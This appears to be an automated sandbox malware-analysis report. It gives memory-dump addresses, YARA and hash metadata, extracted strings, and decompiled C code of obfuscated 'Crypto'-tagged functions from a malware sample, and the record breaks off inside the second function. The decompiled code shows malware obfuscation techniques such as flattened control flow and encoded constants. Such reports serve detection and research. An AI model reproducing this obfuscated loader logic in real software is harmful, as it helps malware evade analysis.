                          0x001e0c77
                          0x001e0c82
                          0x001e0c8a
                          0x001e0c95
                          0x001e0ca0
                          0x001e0ca8
                          0x001e0cb3
                          0x001e0cbe
                          0x001e0ccd
                          0x001e0cd0
                          0x001e0cd4
                          0x001e0cdc
                          0x001e0ce4
                          0x001e0ce9
                          0x001e0cf1
                          0x001e0cf9
                          0x001e0d01
                          0x001e0d0e
                          0x001e0d12
                          0x001e0d1a
                          0x001e0d1f
                          0x001e0d27
                          0x001e0d2f
                          0x001e0d37
                          0x001e0d3f
                          0x001e0d47
                          0x001e0d5a
                          0x001e0d61
                          0x001e0d6c
                          0x001e0d77
                          0x001e0d82
                          0x001e0d8d
                          0x001e0d9d
                          0x001e0da1
                          0x001e0da6
                          0x001e0dab
                          0x001e0db3
                          0x001e0dbe
                          0x001e0dc9
                          0x001e0dd4
                          0x001e0ddc
                          0x001e0de4
                          0x001e0dec
                          0x001e0df4
                          0x001e0dff
                          0x001e0e0a
                          0x001e0e15
                          0x001e0e27
                          0x001e0e2c
                          0x001e0e33
                          0x001e0e3e
                          0x001e0e49
                          0x001e0e54
                          0x001e0e5f
                          0x001e0e6c
                          0x001e0e76
                          0x001e0e7a
                          0x001e0e82
                          0x001e0e8a
                          0x001e0e92
                          0x001e0e9a
                          0x001e0ea2
                          0x001e0ea9
                          0x001e0eb0
                          0x001e0eb0
                          0x001e0eb5
                          0x001e0eb5
                          0x001e0eb9
                          0x001e0eb9
                          0x001e0eb9
                          0x001e0ebf
                          0x00000000
                          0x00000000
                          0x001e0ec5
                          0x001e1004
                          0x001e100a
                          0x001e100a
                          0x001e0f35
                          0x001e0f35
                          0x00000000
                          0x001e0f35
                          0x001e0ed1
                          0x001e0f99
                          0x001e0fd4
                          0x001e0fd9
                          0x001e0fdd
                          0x001e0fe0
                          0x001e0fe2
                          0x001e0feb
                          0x001e0ff0
                          0x00000000
                          0x001e0ff0
                          0x001e0edd
                          0x001e0f8f
                          0x00000000
                          0x001e0f8f
                          0x001e0ee9
                          0x001e0f3e
                          0x001e0f40
                          0x001e0f42
                          0x001e0f49
                          0x001e0f49
                          0x001e0f44
                          0x001e0f44
                          0x001e0f44
                          0x001e0f75
                          0x001e0f7a
                          0x001e0f7f
                          0x001e0f87
                          0x00000000
                          0x001e0f87
                          0x001e0ef1
                          0x001e0f22
                          0x001e0f2a
                          0x001e0f30
                          0x00000000
                          0x001e0f30
                          0x001e0ef9
                          0x001e1280
                          0x001e1280
                          0x001e1286
                          0x001e0f11
                          0x001e0f1a
                          0x001e0f1a
                          0x001e0eb5
                          0x00000000
                          0x001e0eb5
                          0x001e0f08
                          0x00000000
                          0x001e0f0d
                          0x001e1014
                          0x001e101a
                          0x001e126a
                          0x001e126c
                          0x001e1273
                          0x001e1274
                          0x001e1277
                          0x001e1277
                          0x001e127b
                          0x00000000
                          0x001e127b
                          0x001e1020
                          0x001e1026
                          0x001e1252
                          0x00000000
                          0x001e1252
                          0x001e102c
                          0x001e102e
                          0x001e10c7
                          0x001e10ca
                          0x001e10f3
                          0x001e10cc
                          0x001e10cc
                          0x001e10d5
                          0x001e10ea
                          0x001e10ea
                          0x001e112a
                          0x001e1131
                          0x001e1131
                          0x001e1133
                          0x001e1135
                          0x001e1135
                          0x001e113b
                          0x001e113c
                          0x001e1143
                          0x001e1144
                          0x001e117c
                          0x001e118c
                          0x001e1193
                          0x001e1198
                          0x001e119b
                          0x001e119d
                          0x00000000
                          0x001e11a3
                          0x001e11af
                          0x001e11cf
                          0x001e11d4
                          0x001e11d7
                          0x001e11d9
                          0x001e1209
                          0x001e121b
                          0x001e121b
                          0x001e121b
                          0x001e1240
                          0x001e1245
                          0x001e1245
                          0x001e1248
                          0x00000000
                          0x001e1248
                          0x001e119d
                          0x001e1034
                          0x001e103a
                          0x001e10b8
                          0x001e10bf
                          0x00000000
                          0x001e10bf
                          0x001e103c
                          0x001e1042
                          0x00000000
                          0x00000000
                          0x001e106e
                          0x001e107e
                          0x001e1080
                          0x001e108c
                          0x001e1091
                          0x001e1096
                          0x00000000
                          0x001e1096
                          0x001e0eb5

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &JV$M?Dc$M?Dcyg6W$O:q$Ox$Ox$Ox$]^$^2N$g@$k/$v($yg6W$d$x/
                          • API String ID: 0-229219556
                          • Opcode ID: 9c1f64e143a9dd31d9639f860f0b8fb02f7320011ff51c0aefde4eecd6c4b89a
                          • Instruction ID: 7f295f0b3a7fb31d2c98ac075973d6b5dfc5a1e9d45cd1f08c43e6f50949a61d
                          • Opcode Fuzzy Hash: 9c1f64e143a9dd31d9639f860f0b8fb02f7320011ff51c0aefde4eecd6c4b89a
                          • Instruction Fuzzy Hash: 06721E715093819FD3B8CF26C54AA8FBBE1BBD4704F108A1DE5DA96220D7B48949CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D590E, Relevance: 16.7, Strings: 13, Instructions: 421COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E001D590E() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				void* _t486;
				void* _t491;
				intOrPtr* _t502;
				signed int _t507;
				intOrPtr* _t509;
				void* _t523;
				void* _t571;
				signed int* _t576;

				_t576 =  &_v1772;
				_v1576 = 0x6c0937;
				_v1568 = 0;
				_v1564 = 0;
				_v1572 = 0xfa7be3;
				_v1684 = 0xa1225e;
				_v1684 = _v1684 * 0x51;
				_t571 = 0xcaba985;
				_v1684 = _v1684 ^ 0xec4ee212;
				_v1684 = _v1684 ^ 0xdeb53d85;
				_v1720 = 0xe8c45a;
				_v1720 = _v1720 | 0xf7adb3a9;
				_v1720 = _v1720 + 0x22cb;
				_v1720 = _v1720 ^ 0x77ee1ac7;
				_v1628 = 0x3e0abb;
				_v1628 = _v1628 | 0xadd487ce;
				_v1628 = _v1628 ^ 0xadfe8ffd;
				_v1724 = 0xa9a1a9;
				_v1724 = _v1724 + 0x3c79;
				_v1724 = _v1724 << 4;
				_v1724 = _v1724 ^ 0xfba865cd;
				_v1724 = _v1724 ^ 0xf13587ec;
				_v1640 = 0xd94aa8;
				_push(0x54);
				_v1584 = 0;
				_push(0x30);
				_v1640 = _v1640 * 0x32;
				_v1640 = _v1640 ^ 0x2a75666c;
				_v1656 = 0xd7be76;
				_v1656 = _v1656 | 0x34323abd;
				_v1656 = _v1656 + 0xffff2f67;
				_v1656 = _v1656 ^ 0x34f4d203;
				_v1624 = 0xd0dbb;
				_v1624 = _v1624 | 0x70664d6a;
				_v1624 = _v1624 ^ 0x706fa006;
				_v1732 = 0x536538;
				_v1732 = _v1732 | 0x24a4777c;
				_v1732 = _v1732 ^ 0x923db7c3;
				_v1732 = _v1732 + 0x4861;
				_v1732 = _v1732 ^ 0xb6cd66e1;
				_v1748 = 0x993ccf;
				_v1748 = _v1748 + 0xffffaa41;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 >> 8;
				_v1748 = _v1748 ^ 0x00061c85;
				_v1616 = 0xb9c354;
				_v1616 = _v1616 | 0x2561c52e;
				_v1616 = _v1616 ^ 0x25f7eb7a;
				_v1604 = 0xa28582;
				_v1604 = _v1604 / 0;
				_v1604 = _v1604 ^ 0x00043a3e;
				_v1772 = 0x2f2960;
				_t84 =  &_v1772; // 0x2f2960
				_v1772 =  *_t84 / 0;
				_v1772 = _v1772 + 0xffff6c9f;
				_v1772 = _v1772 >> 2;
				_v1772 = _v1772 ^ 0x000d3123;
				_v1600 = 0xfa6674;
				_v1600 = _v1600 >> 9;
				_v1600 = _v1600 ^ 0x0007cbd1;
				_v1716 = 0x560e41;
				_v1716 = _v1716 << 5;
				_v1716 = _v1716 + 0xffff30ad;
				_v1716 = _v1716 ^ 0xf856c5ca;
				_v1716 = _v1716 ^ 0xf29d60ab;
				_v1672 = 0x1d03b2;
				_v1672 = _v1672 >> 7;
				_v1672 = _v1672 ^ 0xe2467494;
				_v1672 = _v1672 ^ 0xe240383a;
				_v1740 = 0xd45536;
				_v1740 = _v1740 << 3;
				_push(0x70);
				_v1740 = _v1740 / 0;
				_v1740 = _v1740 + 0xffff99e5;
				_v1740 = _v1740 ^ 0x00077f48;
				_v1708 = 0x37049a;
				_push(0x4e);
				_v1708 = _v1708 * 0x39;
				_v1708 = _v1708 * 0x32;
				_v1708 = _v1708 | 0x2af70c33;
				_v1708 = _v1708 ^ 0x6efda064;
				_v1752 = 0xbab6bc;
				_v1752 = _v1752 << 5;
				_v1752 = _v1752 + 0xffffe6d4;
				_v1752 = _v1752 + 0xf210;
				_v1752 = _v1752 ^ 0x175ee840;
				_v1608 = 0x31e74e;
				_v1608 = _v1608 + 0x87a0;
				_v1608 = _v1608 ^ 0x003933ce;
				_v1760 = 0x96d30d;
				_v1760 = _v1760 / 0;
				_v1760 = _v1760 << 0xb;
				_v1760 = _v1760 ^ 0x06fe780e;
				_v1760 = _v1760 ^ 0x0c3ab2ae;
				_v1768 = 0xcb4538;
				_v1768 = _v1768 << 6;
				_v1768 = _v1768 << 8;
				_v1768 = _v1768 ^ 0xf0045857;
				_v1768 = _v1768 ^ 0x214cdbb6;
				_v1688 = 0x3364c3;
				_v1688 = _v1688 | 0xfc10ce05;
				_v1688 = _v1688 >> 0xc;
				_v1688 = _v1688 ^ 0x0002c610;
				_v1592 = 0x6206a4;
				_push(0x68);
				_v1592 = _v1592 / 0;
				_v1592 = _v1592 ^ 0x00096e0c;
				_v1744 = 0x9a9470;
				_push(0x22);
				_v1744 = _v1744 / 0;
				_v1744 = _v1744 / 0;
				_v1744 = _v1744 + 0xe629;
				_v1744 = _v1744 ^ 0x000750d6;
				_v1712 = 0x14816c;
				_v1712 = _v1712 >> 6;
				_v1712 = _v1712 << 8;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x0006d353;
				_v1728 = 0x517bb7;
				_v1728 = _v1728 << 0xd;
				_v1728 = _v1728 ^ 0x3d335e2b;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 ^ 0x22dfec30;
				_v1636 = 0x2e04b8;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000a8a1f;
				_v1644 = 0x4d797d;
				_v1644 = _v1644 + 0xffffc264;
				_v1644 = _v1644 ^ 0x0042207f;
				_v1736 = 0x555718;
				_push(0x11);
				_push(0x66);
				_v1736 = _v1736 / 0;
				_push(5);
				_v1736 = _v1736 / 0;
				_v1736 = _v1736 << 0xf;
				_v1736 = _v1736 ^ 0x064b7648;
				_v1692 = 0x69628a;
				_v1692 = _v1692 + 0xffff1f54;
				_v1692 = _v1692 + 0x2631;
				_v1692 = _v1692 ^ 0x00677b46;
				_v1620 = 0xa26def;
				_v1620 = _v1620 + 0xffff3fe2;
				_v1620 = _v1620 ^ 0x00a11335;
				_v1676 = 0xedbb26;
				_v1676 = _v1676 ^ 0x1d2520cb;
				_push(0x24);
				_v1676 = _v1676 / 0;
				_v1676 = _v1676 ^ 0x05f45423;
				_v1696 = 0xcbe6d7;
				_v1696 = _v1696 | 0x05e38ba5;
				_v1696 = _v1696 + 0x750f;
				_v1696 = _v1696 + 0xffff8782;
				_v1696 = _v1696 ^ 0x05e5f613;
				_v1704 = 0x6f7b13;
				_v1704 = _v1704 ^ 0x2497e687;
				_v1704 = _v1704 | 0xe6febff7;
				_v1704 = _v1704 ^ 0xe6fc654b;
				_v1756 = 0xffd234;
				_v1756 = _v1756 | 0x2784bbb9;
				_push(0x7b);
				_v1756 = _v1756 / 0;
				_v1756 = _v1756 << 0xa;
				_v1756 = _v1756 ^ 0x71c6b343;
				_v1700 = 0xc7eab6;
				_v1700 = _v1700 ^ 0x1d8d41ba;
				_v1700 = _v1700 * 0x62;
				_v1700 = _v1700 >> 3;
				_v1700 = _v1700 ^ 0x06d58bd0;
				_v1764 = 0xbf82d0;
				_v1764 = _v1764 + 0xa841;
				_v1764 = _v1764 ^ 0x5b0be419;
				_v1764 = _v1764 / 0;
				_v1764 = _v1764 ^ 0x00b8f45b;
				_v1648 = 0xb1e911;
				_v1648 = _v1648 >> 0xa;
				_v1648 = _v1648 ^ 0x0001dabf;
				_v1664 = 0x82c0c8;
				_v1664 = _v1664 | 0x5049715d;
				_v1664 = _v1664 << 0x10;
				_v1664 = _v1664 ^ 0xf1d7801f;
				_v1596 = 0x501912;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x0011e0e6;
				_v1680 = 0xb74d6a;
				_v1680 = _v1680 << 2;
				_v1680 = _v1680 + 0xe7bf;
				_v1680 = _v1680 ^ 0x02d8e76f;
				_v1632 = 0xb33cbe;
				_push(9);
				_t507 = _v1584;
				_v1632 = _v1632 / 0;
				_v1632 = _v1632 ^ 0x00185539;
				_v1588 = 0xe243c5;
				_v1588 = _v1588 * 0x6e;
				_v1588 = _v1588 ^ 0x6134a095;
				_v1652 = 0xdd8522;
				_v1652 = _v1652 >> 0xd;
				_v1652 = _v1652 + 0xffff03a2;
				_v1652 = _v1652 ^ 0xfff3aaff;
				_v1660 = 0x14cb16;
				_v1660 = _v1660 + 0xf2a5;
				_v1660 = _v1660 ^ 0xf73fdfe0;
				_v1660 = _v1660 ^ 0xf72952af;
				_v1668 = 0x99f37;
				_v1668 = _v1668 | 0xf3ff6f1f;
				_v1668 = _v1668 ^ 0xf3f97928;
				_v1612 = 0x42a852;
				_v1612 = _v1612 + 0xffffd393;
				_v1612 = _v1612 ^ 0x004ec082;
				while(1) {
					L1:
					_t523 = 0x5c;
					while(1) {
						L2:
						_t486 = 0x60246ae;
						do {
							L3:
							if(_t571 == 0x2843c29) {
								_push(_v1744);
								_push(_v1592);
								__eflags = E001C975A(0x1c10a0,  &_v1580, _v1628, _v1712, _v1720, _v1728, _v1636, _v1644, _v1736, _v1692, 0x1c10a0, 0x1c10a0, E001DCD35(0x1c10a0, _v1688, __eflags));
								_t571 =  ==  ? 0x60246ae : 0x7a70633;
								E001D629F(_v1620, _t487, _v1676, _v1696, _v1704);
								_t576 =  &(_t576[0x10]);
								_t486 = 0x60246ae;
								_t523 = 0x5c;
								goto L17;
							} else {
								if(_t571 == 0x46efd61) {
									_push(_v1604);
									_push(_v1616);
									_t491 = E001DCD35(0x1c1020, _v1748, __eflags);
									E001E23F2( &_v1040, __eflags);
									E001DE35F( *0x1e5218 + 0x18, __eflags, _v1772, _v1600, _v1716, 0x104, _v1672,  &_v1560,  &_v1040, _t491, _v1740,  *0x1e5218 + 0x234, _v1708);
									E001D629F(_v1752, _t491, _v1608, _v1760, _v1768);
									_t576 =  &(_t576[0x10]);
									_t571 = 0xa4d7bc3;
									goto L1;
								} else {
									if(_t571 == _t486) {
										_t502 = E001E00C1( &_v1560, _v1648, _v1724, _v1580, 2 + E001CB01D(_v1756, _v1700,  &_v1560, _v1764) * 2, _v1664, _v1596, _v1680, _v1632, _v1588, _t507);
										_t576 =  &(_t576[0xc]);
										__eflags = _t502;
										_t571 = 0xaadd24e;
										_v1584 = 0 | __eflags == 0x00000000;
										while(1) {
											L1:
											_t523 = 0x5c;
											goto L2;
										}
									} else {
										if(_t571 == 0xa4d7bc3) {
											_t509 =  *0x1e5218 + 0x234;
											while(1) {
												__eflags =  *_t509 - _t523;
												if(__eflags == 0) {
													break;
												}
												_t509 = _t509 + 2;
												__eflags = _t509;
											}
											_t507 = _t509 + 2;
											_t571 = 0x2843c29;
											goto L2;
										} else {
											if(_t571 == 0xaadd24e) {
												E001C9FE4(_v1580, _v1652, _v1660, _v1668, _v1612);
											} else {
												if(_t571 != 0xcaba985) {
													goto L17;
												} else {
													E001CB3B4(_v1640, _t523, _v1656, _t523, _v1624,  &_v520, _v1732, _v1684);
													_t576 =  &(_t576[7]);
													_t571 = 0x46efd61;
													while(1) {
														L1:
														_t523 = 0x5c;
														L2:
														_t486 = 0x60246ae;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L20:
							return _v1584;
							L17:
							__eflags = _t571 - 0x7a70633;
						} while (__eflags != 0);
						goto L20;
					}
				}
			}



































































                          0x001d590e
                          0x001d5914
                          0x001d5921
                          0x001d592a
                          0x001d5931
                          0x001d593c
                          0x001d594d
                          0x001d5951
                          0x001d5956
                          0x001d595e
                          0x001d5966
                          0x001d596e
                          0x001d5976
                          0x001d597e
                          0x001d5986
                          0x001d5991
                          0x001d599c
                          0x001d59a7
                          0x001d59af
                          0x001d59b7
                          0x001d59bc
                          0x001d59c4
                          0x001d59cc
                          0x001d59df
                          0x001d59e1
                          0x001d59e9
                          0x001d59eb
                          0x001d59f2
                          0x001d59fd
                          0x001d5a08
                          0x001d5a13
                          0x001d5a1e
                          0x001d5a29
                          0x001d5a34
                          0x001d5a3f
                          0x001d5a4a
                          0x001d5a52
                          0x001d5a5a
                          0x001d5a62
                          0x001d5a6a
                          0x001d5a72
                          0x001d5a7a
                          0x001d5a82
                          0x001d5a87
                          0x001d5a8c
                          0x001d5a94
                          0x001d5a9f
                          0x001d5aaa
                          0x001d5ab5
                          0x001d5acb
                          0x001d5ad2
                          0x001d5add
                          0x001d5ae5
                          0x001d5aec
                          0x001d5af0
                          0x001d5af8
                          0x001d5afd
                          0x001d5b05
                          0x001d5b10
                          0x001d5b18
                          0x001d5b23
                          0x001d5b2b
                          0x001d5b30
                          0x001d5b38
                          0x001d5b40
                          0x001d5b48
                          0x001d5b50
                          0x001d5b55
                          0x001d5b5d
                          0x001d5b67
                          0x001d5b6f
                          0x001d5b78
                          0x001d5b7f
                          0x001d5b83
                          0x001d5b8b
                          0x001d5b93
                          0x001d5ba0
                          0x001d5ba2
                          0x001d5bab
                          0x001d5baf
                          0x001d5bb7
                          0x001d5bbf
                          0x001d5bc7
                          0x001d5bcc
                          0x001d5bd4
                          0x001d5bdc
                          0x001d5be4
                          0x001d5bef
                          0x001d5bfa
                          0x001d5c05
                          0x001d5c15
                          0x001d5c19
                          0x001d5c1e
                          0x001d5c26
                          0x001d5c2e
                          0x001d5c36
                          0x001d5c3b
                          0x001d5c40
                          0x001d5c48
                          0x001d5c50
                          0x001d5c58
                          0x001d5c60
                          0x001d5c65
                          0x001d5c6d
                          0x001d5c82
                          0x001d5c84
                          0x001d5c8d
                          0x001d5c98
                          0x001d5ca7
                          0x001d5ca9
                          0x001d5cb6
                          0x001d5cba
                          0x001d5cc2
                          0x001d5cca
                          0x001d5cd2
                          0x001d5cd7
                          0x001d5cdc
                          0x001d5ce1
                          0x001d5ce9
                          0x001d5cf1
                          0x001d5cf6
                          0x001d5cfe
                          0x001d5d03
                          0x001d5d0b
                          0x001d5d16
                          0x001d5d1e
                          0x001d5d29
                          0x001d5d34
                          0x001d5d3f
                          0x001d5d4c
                          0x001d5d58
                          0x001d5d5d
                          0x001d5d5f
                          0x001d5d6c
                          0x001d5d6e
                          0x001d5d74
                          0x001d5d79
                          0x001d5d81
                          0x001d5d89
                          0x001d5d91
                          0x001d5d99
                          0x001d5da1
                          0x001d5dac
                          0x001d5db7
                          0x001d5dc2
                          0x001d5dca
                          0x001d5dd9
                          0x001d5ddb
                          0x001d5de1
                          0x001d5de9
                          0x001d5df1
                          0x001d5df9
                          0x001d5e01
                          0x001d5e09
                          0x001d5e11
                          0x001d5e19
                          0x001d5e21
                          0x001d5e29
                          0x001d5e31
                          0x001d5e39
                          0x001d5e48
                          0x001d5e4a
                          0x001d5e50
                          0x001d5e55
                          0x001d5e5d
                          0x001d5e65
                          0x001d5e73
                          0x001d5e77
                          0x001d5e7c
                          0x001d5e84
                          0x001d5e8c
                          0x001d5e94
                          0x001d5ea2
                          0x001d5ea6
                          0x001d5eae
                          0x001d5eb9
                          0x001d5ec1
                          0x001d5ecc
                          0x001d5ed4
                          0x001d5edc
                          0x001d5ee1
                          0x001d5ee9
                          0x001d5ef4
                          0x001d5efc
                          0x001d5f07
                          0x001d5f0f
                          0x001d5f14
                          0x001d5f1c
                          0x001d5f24
                          0x001d5f3d
                          0x001d5f42
                          0x001d5f49
                          0x001d5f50
                          0x001d5f5b
                          0x001d5f6e
                          0x001d5f75
                          0x001d5f80
                          0x001d5f8b
                          0x001d5f93
                          0x001d5f9e
                          0x001d5fa9
                          0x001d5fb4
                          0x001d5fbf
                          0x001d5fca
                          0x001d5fd5
                          0x001d5fdd
                          0x001d5fe5
                          0x001d5fed
                          0x001d5ff8
                          0x001d6003
                          0x001d600e
                          0x001d600e
                          0x001d6010
                          0x001d6011
                          0x001d6011
                          0x001d6011
                          0x001d6016
                          0x001d6016
                          0x001d6018
                          0x001d61c7
                          0x001d61d0
                          0x001d6221
                          0x001d6244
                          0x001d6247
                          0x001d624c
                          0x001d624f
                          0x001d6256
                          0x00000000
                          0x001d601e
                          0x001d6024
                          0x001d6122
                          0x001d612e
                          0x001d6139
                          0x001d6147
                          0x001d619b
                          0x001d61b5
                          0x001d61ba
                          0x001d61bd
                          0x00000000
                          0x001d602a
                          0x001d602c
                          0x001d6102
                          0x001d6109
                          0x001d610c
                          0x001d610e
                          0x001d6116
                          0x001d600e
                          0x001d600e
                          0x001d6010
                          0x00000000
                          0x001d6010
                          0x001d602e
                          0x001d6034
                          0x001d608a
                          0x001d6095
                          0x001d6095
                          0x001d6098
                          0x00000000
                          0x00000000
                          0x001d6092
                          0x001d6092
                          0x001d6092
                          0x001d609a
                          0x001d609d
                          0x00000000
                          0x001d6036
                          0x001d603c
                          0x001d6285
                          0x001d6042
                          0x001d6048
                          0x00000000
                          0x001d604e
                          0x001d6075
                          0x001d607a
                          0x001d607d
                          0x001d600e
                          0x001d600e
                          0x001d6010
                          0x001d6011
                          0x001d6011
                          0x00000000
                          0x001d6011
                          0x001d600e
                          0x001d6048
                          0x001d603c
                          0x001d6034
                          0x001d602c
                          0x001d6024
                          0x001d628d
                          0x001d629e
                          0x001d6257
                          0x001d6257
                          0x001d6257
                          0x00000000
                          0x001d6263
                          0x001d6011

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #1$)$+^3=$7l$:8@$F{g$N1$]qIP$`)/$jMfp$lfu*$y<$}yM
                          • API String ID: 0-2915221957
                          • Opcode ID: e8eccbc3ec9307899e13e8d6f83789fedb09e487fd2430bfccf5c56b39619302
                          • Instruction ID: 20f72fe13534e5265a67b873391870a307dcbbc0722c6e8251b8168387ac4f9b
                          • Opcode Fuzzy Hash: e8eccbc3ec9307899e13e8d6f83789fedb09e487fd2430bfccf5c56b39619302
                          • Instruction Fuzzy Hash: 0B2201715083809FD3B8CF61C98AA8FBBE2BBD4748F10891DE1D986260D7B58949CF47
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AA890, Relevance: 15.7, Strings: 11, Instructions: 1959COMMON
                          Download Yara Rule
                          Strings
                          • $, xrefs: 6E4ABBF3
                          • called `Option::unwrap()` on a `None` value, xrefs: 6E4AC12E
                          • @*&<>()C,, xrefs: 6E4AC030, 6E4AC0F2
                          • .assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6E4ABCC4, 6E4AC087
                          • called `Result::unwrap()` on an `Err` value, xrefs: 6E4AC14D
                          • __ZN, xrefs: 6E4AAD97
                          • .llvm.C:krlaoyielwznvejuafezypqcocmjtjjtbijbqwlufiemtvzrncrsqklaorfwhkaclbsrhxcyxfrzrgfapvzyvasietlisocljucmq, xrefs: 6E4AA8AD
                          • $, xrefs: 6E4ABBE3
                          • SizeLimitExhausted, xrefs: 6E4AC299
                          • h, xrefs: 6E4AB8AB
                          • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6E4AB589
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: $$$$.assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed$.llvm.C:krlaoyielwznvejuafezypqcocmjtjjtbijbqwlufiemtvzrncrsqklaorfwhkaclbsrhxcyxfrzrgfapvzyvasietlisocljucmq$@*&<>()C,$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value$h
                          • API String ID: 0-351887750
                          • Opcode ID: 760ae1c284088e7be482f3c299a5c18c822e511b1b89ce98b2920e28a34e5c96
                          • Instruction ID: 0f472808983e77f5328576a747baf67afc36f37c8a25e1592299efb96290d3b7
                          • Opcode Fuzzy Hash: 760ae1c284088e7be482f3c299a5c18c822e511b1b89ce98b2920e28a34e5c96
                          • Instruction Fuzzy Hash: F6E20671A083458FD354CEBCC490E5ABBE2AFD5360F048A1FE6A58B39DD7719845CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001DC205, Relevance: 14.2, Strings: 11, Instructions: 450COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E001DC205(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				unsigned int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				void* _t487;
				void* _t491;
				short* _t496;
				void* _t498;
				void* _t504;
				void* _t507;
				void* _t516;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				void* _t529;
				void* _t543;
				signed int _t589;
				void* _t591;
				signed int* _t596;

				_t596 =  &_v1788;
				_v1584 = _v1584 & 0x00000000;
				_v1632 = 0x53b728;
				_v1632 = _v1632 + 0xffffd00f;
				_v1632 = _v1632 ^ 0x02538737;
				_v1692 = 0x5dde51;
				_v1692 = _v1692 + 0xffffc72f;
				_v1692 = _v1692 << 8;
				_v1692 = _v1692 ^ 0x5da9926e;
				_v1672 = 0xad9f1;
				_v1672 = _v1672 >> 8;
				_v1672 = _v1672 + 0xfffff529;
				_v1672 = _v1672 ^ 0x00008b94;
				_v1596 = 0xf223a8;
				_t516 = __ecx;
				_t591 = 0x64278db;
				_t518 = 0x1f;
				_v1596 = _v1596 / _t518;
				_v1596 = _v1596 ^ 0x000ed2b2;
				_v1768 = 0x3ef02a;
				_v1768 = _v1768 << 7;
				_v1768 = _v1768 + 0xa089;
				_v1768 = _v1768 + 0x3571;
				_v1768 = _v1768 ^ 0x1f77b471;
				_v1708 = 0xc715be;
				_t519 = 0x7c;
				_v1708 = _v1708 / _t519;
				_v1708 = _v1708 + 0xa9b;
				_v1708 = _v1708 ^ 0x000cc03e;
				_v1640 = 0xf5c20e;
				_v1640 = _v1640 + 0x1e32;
				_v1640 = _v1640 ^ 0x00fd9706;
				_v1680 = 0xf22aa7;
				_v1680 = _v1680 | 0x1e0d26ed;
				_t520 = 0x43;
